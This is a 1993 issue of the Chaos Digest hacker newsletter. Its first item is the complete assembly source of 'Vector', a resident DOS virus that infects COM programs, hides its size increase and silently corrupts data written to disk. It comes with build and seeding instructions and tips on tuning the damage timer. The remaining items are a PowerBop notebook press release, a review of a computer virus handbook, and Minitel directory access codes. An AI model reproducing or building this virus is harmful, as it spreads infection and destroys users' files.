Chaos Digest              Monday, 7 June 1993          Volume 1 : Number 45
                                                       ISSN 1244-4901

       Editor: Jean-Bernard Condat (jbcondat@attmail.com)
       Archivist: Yves-Marie Crabbe
       Co-editors: Arnaud Bigare, Stephane Briere

TABLE OF CONTENTS, #1.45 (7 June 1993)
File 1--The Vector virus (a writing exercise)
File 2--PowerBop, Apple's wireless-communicating portable (technical)
File 3--Review of Highland's _Computer Virus Handbook_ (book)
File 4--The electronic directory [11] in foreign languages (access)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
                linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following information:
                X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893.

Back issues of ChaosD can be found on the Internet as part of the Computer
underground Digest archives. They're accessible using anonymous FTP:
* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited. Some
authors do copyright their material, and they should be contacted for reprint
permission. Readers are encouraged to submit reasoned articles in French,
English or German relating to computer culture and telecommunications.
Articles are preferred to short responses. Please avoid quoting previous
posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators. Chaos Digest contributors assume all responsibility
for ensuring that articles submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Wed, 2 Jun 1993 14:03:46 +0100 (WET DST)
From: NTH@altern.com (Necros the Hacker)
Subject: File 1--The Vector virus (a writing exercise)

The Vector Virus
by Necros the Hacker

This is a fairly simple virus I wrote a while back. However, for its size it
has some nice features, including
* memory resident in the interrupt vector table;
* hides file size increases;
* infects COM programs on opening or execution;
* small and subtle, but nasty, damage routine.

The main aim of the virus was to write something small and well-coded. At 376
bytes it's not tiny but it's small enough to fit into the interrupt vector
table. The side effects of placing the virus in the interrupt table are that
it may conflict with other programs which use the interrupts, but more
importantly it can go resident without users noticing a decrease in system
memory.

Ok, so that's the idea behind it. Now what does it do? Well, it's resident in
memory and infects COM programs when they're opened or executed. Notice that's
COM *programs*, not just files. It checks to see if the file is actually a COM
program with an EXE extension too. The virus has a timer which counts up to
0FFFh & when this number of writes takes place in DOS with the virus resident,
it performs its damage. The damage is simply to change the data that was
written subtly --- a byte is dropped from the start of the written block &
appended to the end. So there's no change in size of the file that was
written. For EXE programs or archive programs or backup programs this sort of
error can ruin the whole file. At least it makes the job of recovering the
undamaged data from the damaged stuff very difficult.

The virus also hides file size increases. Each infected file has its date
increased by a century, so it won't appear as being different in listings.
Only FCB calls are intercepted & massaged into subtracting the virus' length.
I couldn't be bothered to do it for handle calls cos FCBs are used in the DOS
dir command.

Anyway, I present this code more as a demonstration of how to do some common
things efficiently. I'm mainly interested in writing good code, so if anyone's
got any suggestions on how to make it better, you can comment here if the list
maintainer is in agreement.

Oh, one last thing. The assembler code is turned into a COM program using tasm
& tlink. The resultant program is actually an infector of a program called
test.com. Just create a simple 3-byte program & then run vector.com which will
infect the test program. There's a message at the end of the virus which can
be removed if you want. Don't just overwrite it with your own. Removing it is
a matter of moving the line just after message db . . . to just before it.
Another thing you might want to modify is the damage timer . . . change 0fffh
in the code to some other value. I'll leave you to figure out what to change
it to yourself.
It shouldn't be too dificult :) Have fun, NTH --------------------------------------------------------------------------- ;VECTOR.ASM Written by Necros the Hacker 12 Aug 1991 ;TSR virus which resides in interrupt table model tiny code org 100h ;makes no difference - relocatable start: jmp shell ;the non-resident part of the virus ;the three previous bytes are overwritten with host's first bytes org 103h repair: mov si,[ds:101h] ;find offset of virus from 100h mov di,100h ;place to write original file bytes push di add si,di ;si is now start of virus cld movsb movsw ;restore start of host push es xor bx,bx ;suitably unused register mov es,bx mov cx,[es:0084h] ;offset of int 21 handler mov dx,[es:0086h] ;segment of int 21 handler push ax mov ax,4bf1h int 21h mov di,ax pop ax cmp di,0abc0h ;signature jz restart_host ;already installed sub si,3 ;point to start of virus again ;code to make resident and hook vectors ;first save the old vector (in this copy) mov (old_int_21-100h)[si],cx mov (old_int_21-0feh)[si],dx ;now make the copy! mov di,07bh*4 mov cx,virus_length rep movsb ;now hook the vector proper cli mov [es:0084h],offset handler_offset mov [es:0086h],cx sti ;and fall through to restart the host restart_host: pop es ret ;start host (note AX unchanged by virus) jump_buf_offset equ $-100h+07bh*4 jump_buf db 0e9h,0,0 ;jump to replace start of host modify_dir proc near pushf call dword ptr cs:chain_offset cmp al,0ffh je ret_error push es push bx push ax mov ah,2fh int 21h cmp byte ptr es:[bx],0ffh ;is extended FCB? jne not_extended add bx,7 not_extended: cmp byte ptr es:[bx+1ah],51 ;year>2105 AD? 
jbe no_mods sub word ptr es:[bx+1dh],virus_length no_mods: pop ax pop bx pop es ret_error: iret modify_dir endp ;new int 21 handler even ;although the virus is relocatable, it will ;always be on an even address when resident chain_offset equ $-100h+07bh*4 ;alsolute address to chain to old_int_21 dw 0,0 handler_offset equ $-100h+07bh*4 new_handler proc cmp ax,4bf1h ;residency request jne is_dir mov ax,0abc0h iret is_dir: cmp ah,11h je modify_dir cmp ah,12h je modify_dir cmp ah,40h ;write? jne is_open cmp bl,3 ;don't affect stdout/stderr/stdin jb damage_ok inc dx ;perform damage dec word ptr cs:[offset counter_offset] jz damage_ok dec dx ;not time for damage, so undo it damage_ok: and word ptr cs:[offset counter_offset],0fffh jmp normal_handler is_open: cmp ah,3dh ;open file (read only) jne is_exec ;infect only COM (or EXE) files when opened push ax push si mov si,dx cld find_extension: lodsb or al,al je no_infect cmp al,'.' ;look for the extension jne find_extension ;OK now check to see if the extension is COM or EXE lodsb or al,20h cmp al,'c' jne try_exe lodsw or ax,2020h cmp ax,'mo' jne no_infect je eligible try_exe: lodsw or ax,2020h cmp ax,'ex' jne no_infect eligible: pop si pop ax jmp infect_file no_infect: pop si pop ax jmp normal_handler is_exec: cmp ax,4b00h ;EXEC? jne normal_handler infect_file: ;code to infect the file push ax push bx push cx push dx push ds ;open the file for infecting mov ax,3d02h xor cx,cx pushf call dword ptr cs:chain_offset jc restore_regs mov bx,ax push cs pop ds mov ah,3fh ;read from handle mov cx,3 ;first three bytes mov dx,07bh*4h ;to start of virus (jumped over) int 21h jc no_date_set ;only small files cmp ds:[07bh*4],'ZM' ;EXE file? 
je no_date_set mov ax,5700h ;get time and date stamp int 21h push cx push dx cmp dh,51 ;year>=2005 (1980+25+1 from month) ja close_file pop dx add dh,200 ;gives same year in next century push dx ;will be set before closing mov ax,4202h ;LSEEK to end of file xor cx,cx xor dx,dx int 21h mov word ptr offset jump_buf_offset+1,ax ;save length of host ;while we're here, append the virus mov ah,40h mov cx,virus_length mov dx,07bh*4 int 21h jc close_file mov ax,4200h ;LSEEK to start of file xor cx,cx xor dx,dx int 21h mov ah,40h ;write with handle mov cx,3 mov dx,offset jump_buf_offset int 21h close_file: pop dx pop cx mov ax,5701h ;reset time and date int 21h no_date_set: mov ah,3eh int 21h restore_regs: pop ds pop dx pop cx pop bx pop ax normal_handler: ;either open or EXEC jmp dword ptr cs:chain_offset new_handler endp counter_offset equ $-100h+07bh*4 counter dw 0 ;when counter reaches zero, byte is "lost" message db 'V3.0 [VECTOR] (c) Necros the Hacker',10,13 db 'Written Aug 1991 in Tralee, Ireland',10,13 virus_length equ $-start shell: ;open the file for infecting mov ax,3d02h xor cx,cx mov dx,offset filename int 21h jc shell_error mov bx,ax mov ah,3fh ;read from handle mov cx,3 ;first three bytes mov dx,0100h ;to start of virus (jumped over) int 21h jc shell_error mov ax,4202h ;LSEEK to end of file xor cx,cx xor dx,dx int 21h mov word ptr jump_buf+1,ax ;save length of host ;while we're here, append the virus mov ah,40h mov cx,virus_length mov dx,0100h int 21h jc shell_error mov ax,4200h ;LSEEK to start of file xor cx,cx xor dx,dx int 21h mov ah,40h ;write with handle mov cx,3 mov dx,offset jump_buf int 21h mov ah,3eh int 21h exit_stub: mov ax,4c00h int 21h shell_error: mov ah,9 mov dx,offset err$ int 21h jmp exit_stub err$ db 'Error infecting file',10,13,'$' filename db 'test.com',0 end start ------------------------------ Date: Fri Jun 4 12:07:00 -0600 1993 From: cccf@email.teaser.com (cccf ) Subject: File 2--PowerBop, le portable Apple communicant sans fils 
(technique)

Apple European R&D extends mobile computing with wireless communications

Paris La Defense, June 4, 1993--With PowerBop, the first notebook integrating
cordless communications technology, recently launched in France, Apple
European R&D extends mobile computing and enhances communications
capabilities. PowerBop, the newest model of the popular PowerBook series,
offers the highest degree of autonomy on the notebook computer market today.

The ongoing technical cooperation between the Apple European R&D Centre, based
in Paris, and France Telecom, the French PTO operator, resulted in the
integration of radio capabilities with notebook computers, making it possible
to connect them to Telepoint services. Telepoint is expanding more and more in
Europe and uses the most affordable wireless technology available today. Apple
European R&D focuses primarily on modems, on telecommunications in mobile
computers and on products that comply with OSI (Open System Interconnection)
standards.

PowerBop: A new dimension in communications freedom
+---------------------------------------------------

PowerBop brings notebook users an added dimension of freedom, above and beyond
the inherent benefits of Apple's popular PowerBook models. The PowerBop
contains a radio modem conforming to the CT2 Telepoint standard in accordance
with the Common Air Interface (CAI), adopted in June 1991 at a European level.
The CT2 standard allows a new generation of personal telephones. Their owners
are able to use them in public places in large cities, at home as a
traditional cordless phone and in the office via PBX extensions.

Within the PowerBop, the CT2 radio modem provides the ability to connect it to
a full range of communications services, at any time, from any place that is
located between 20 and 500 meters from the base station of the Pointel network
"Bi-Bop", launched by France Telecom in Paris and Strasbourg on April 22,
1993. These services include: access to the France Telecom videotex service
"Minitel", message and file exchange, fax transmission, access to servers and
databases. Thanks to the low energy consumption of the CT2 technology, the
PowerBop retains its 1-1/2 to 2 hours of endurance when the wireless modem is
being used.

The PowerBop features all the advantages of the PowerBook 180, Apple's
high-end notebook. The internal floppy disk drive is replaced by the CT2
modem, which means that users do not need to carry any additional equipment to
communicate via the telepoint network. An external floppy disk drive is
supplied as a standard accessory. Like the Bi-Bop pocket phone designed and
developed by France Telecom, the Apple PowerBop has a small antenna which
folds into a special slot.

The Express Modem provided as standard equipment inside the PowerBop offers a
full range of communications functions:
* access to one of the 15,000 Minitel services;
* fax transmission (reception will be available on the French network from
  September 1993);
* data transmission from 300 to 14,400 bps.

The Express Modem can either be connected directly to a telephone line or use
the Bi-Bop network for wireless communications up to 9,600 bps.

Digital Cordless Market
+-----------------------

European operators view telepoint as a mass market application for wireless
telephones. At the present time, no European country offers a nationwide
commercial telepoint service. However, there are currently a number of
networks of this type spreading out, mainly in the UK, Netherlands, Finland
and Belgium. In other parts of the world, other such developments are under
way, in Asia, Australia, Canada and the United States. On the sales side, it
appears that all the operators have a common desire to implement a pricing
structure to allow this technology to be affordable for a consumer market.

France Telecom's new Bi-Bop service
+-----------------------------------

France Telecom took a leading role in the development of European telepoint
services. On April 22, France Telecom launched the Bi-Bop cordless digital
pocket phone in Paris. The system, which employs the CT2 cordless standard,
sets up a digital radio link between the Bi-Bop terminal and a public or home
base station. The Bi-Bop service covers three main types of use:
* Public use: Bi-Bop subscribers can call anywhere in the world from major
  cities, starting with Paris and Strasbourg. The network is designed to cover
  major thoroughfares and public places. Today, some 3,000 base stations
  (4,000 by fall 1993) span Paris and the greater Paris area (Ile-de-France)
  and the network will be progressively extended to other areas. Starting in
  September 1993, subscribers will also be able to receive calls, and PowerBop
  notebook users will have fax reception capacities;
* With a private home base station connected to a standard telephone outlet,
  the PowerBop is transformed into a high-performance mobile computing tool
  allowing one to access all private communications services;
* Wireless PBXs are available to companies, allowing PowerBop users anywhere
  at a site, for example, to benefit from the same computing environment as if
  the user was at his desk. The PowerBop can also become a mobile fax
  terminal.

Availability
+------------

The PowerBop will be available through certified Apple Computer France
distributors in June 1993. PowerBop owners must have a special telephone
subscription with France Telecom.

Nota Bene
+---------

At this time, I am in a luxurious cafe on the Champs-Elysees in Paris on
holiday and I send this note to ChaosD with my PowerBop... without any
problem...
------------------------------

Date: Fri Jun 4 12:07:00 -0600 1993
From: roberts@decus.arc.ab.ca ("Rob Slade, DECrypt Editor, VARUG NLC rep")
Subject: File 3--Review of Highland's _Computer Virus Handbook_ (book)
Copyright: Robert M. Slade, 1993

Elsevier
Mayfield House
256 Banbury Road
Oxford OX2 7DH
England

655 Avenue of the Americas
New York, NY 10010
USA
212-989-5800
fax: 212-633-3990

Computer Virus Handbook, Harold Joseph Highland 1990, 0-946395-46-2

When Dr. Highland first offered to send me a copy of this work, late in 1992,
he indicated that it was outdated. In some respects this is true. Some of the
precautions suggested in a few of the essays which Dr. Highland did not write
tend to sound quaint. As one example, with the advantage of hindsight, Jon
David's ten page antiviral review checklist contains items of little use, and
has a number of important gaps. However, for the "general", rather than
"specialist" audience, this work has much to recommend it. The coverage is
both broad and practical, and the information, although not quite up to date,
is complete and accurate as far as it goes.

The book starts with, as the title has it, "Basic Definitions and Other
Fundamentals". Dr. Highland has collected definitions from a number of sources
here, which makes a refreshing change from some of the dogmatic assertions in
other works. The fact that the reader is left to make his own final decision
as to a working definition might be frustrating to some, but is likely
reasonable given that the argument over the definition of a virus is still
raging to this day. With the changes that are still taking place in terms of
new "forms" of viral programs, it is unlikely that this debate will be settled
any time soon. Chapter one also contains important background information on
the operation of the PC and the structure of MS-DOS format disks. The one
shortcoming might be that so much of the book deals with MS-DOS machines that
readers dealing with other systems may fail to note the generic concepts
contained therein.

Chapter two is a concise but encompassing overview of the viral situation by
William Hugh Murray. Using epidemiology as a model, he covers the broad
outline of viral functions within a computing "environment", and examines
some theoretical guidelines to direct the building of policy and procedures
for prevention of viral infection. The article is broadly helpful without ever
pushing the relation between computer viral and human epidemiology too far.

Chapter three deals with history and examples of specific viral programs. This
section is an extremely valuable resource. While other works reviewed have
contained similar sections, the quality of this segment in Highland's tome is
impressive. Mention must be made of the reports by Bill Kenny of Digital
Dispatch who provides detailed and accurate descriptions of the operations of
a number of viral programs which are, unfortunately, all still too common.
(Chapter four is similar, containing three reports of viral programs from
other sources.)

Large sections of the handbook deal with the evaluation and review of
antiviral software. (I must say that I had great sympathy with that part of
the preface which dealt with some experiences encountered when trying to test
various packages.) Chapter five gives an evaluation protocol and test
methodology. The detail here may lead some to skip over it, but it is helpful
to those who wish to determine how thoroughly the testing was conducted.
Chapter six, an article by Jon David as mentioned earlier, is a suggested
procedure and checklist for testing antiviral software. This chapter is
unfortunately weak, and although there is some valuable direction, one comes
away with the impression that the important thing to test is whether the
program runs on a VGA monitor and has a bound manual. One must, of course,
realize that antiviral testing was then in its infancy, and Mr. David's
article reflects the general tone of those times.

Chapter seven is concerned with specific product evaluations, and, as most
lists of its type do, shows its age. Of the twenty products listed, I
recognize only seven as still being in existence; of those that still do
exist four have changed substantially in the intervening three years.

Chapter eight is an essay by Harry de Maio entitled "Viruses - A Management
Issue", and it must be considered one of the "forgotten gems" of virus
literature. It debunks a number of myths, and raises a number of issues seldom
discussed in corporate security and virus management. Chapter nine is
similar, being Dr. Highland's suggested procedures for reducing the risk of
computer virus infection.

Chapter ten is a collection of essays on theoretical aspects of computer virus
research and defence. Fred Cohen is heavily represented here, of course, but
not as singularly as in, for example, Hoffman's "Rogue Programs".

Dated as the book may be in some respects, it is still a valuable overview for
those wishing to study viral programs or the defence against them,
particularly in a corporate environment. While some may find the book to be
"academic" in tone, it never launches into "blue sky" speculations: all of the
material here is realistic. The "aging" of the product reviews makes it
difficult to consider it still a reference "handbook" or a "how to" resource,
but Dr. Highland's work is by no means to be discarded yet.

+++++++++++++++
Vancouver      ROBERTS@decus.ca     | "Do you get guns with your
Institute for  Robert_Slade@sfu.ca  |  gun magazines? No.
Research into  rslade@cue.bc.ca     |  Do you get viruses with your
User           p1@CyberStore.ca     |  virus magazines? Yes."
Security       Canada V7K 2G6       |        - Kevin Marcus

------------------------------

Date: 03 Jun 93 23:59:59 GMT
From: jbcondat@attmail.com (Jean-Bernard Condat)
Subject: File 4--The electronic directory [11] in foreign languages (access)
Repost from: telecom3.373.2@eecs.nwu.edu

Since the beginning of February, the French "Annuaire Electronique" is
available in Italian. You can access it, from France, by dialing 3614 code
RAE, and from other countries, by MinitelNet or by a telephone line:
+33 36 43 14 14 code RAE (Ricerca Annuario Elettronico).

+----------------------------------------+
| *R*icerca                              |
| *A*nnuario                             |
| *E*lettronico                          |
|                                        |
|  1  Ricerca di un abbonato             |
|                                        |
|  2  LA POSTA : codice di               |
|     avviamento postale                 |
|                                        |
|  3  Sapere tutto sull'elenco           |
|     elettronico                        |
|                                        |
|  4  Sapere tutto sul minitel           |
|                                        |
|  5  L'elenco elettronico               |
|     e teletel dall'estero              |
|                                        |
|----------------------------------------|
| N° scelto: ...  poi Invio              |
|               (C) France Telecom 1992  |
+----------------------------------------+

For all versions, all diagnostics, instructions and the list of professionals
are translated into the appropriate language. Five different options are
available: "Search for a subscriber", "The Post Office: Postal Code", "All you
need to know about the Electronic Directory", "All you need to know about the
Minitel", "Electronic Directory and Teletel from abroad".

Called the "11" in France, this service is already available in:
* English: 3614 code ED [Electronic Directory];
* Spanish: 3614 code GTE [Guidia Telefonica Electronia];
* German : 3614 code ETB [Elektronisches Telefonbuch].

------------------------------

End of Chaos Digest #1.45
************************************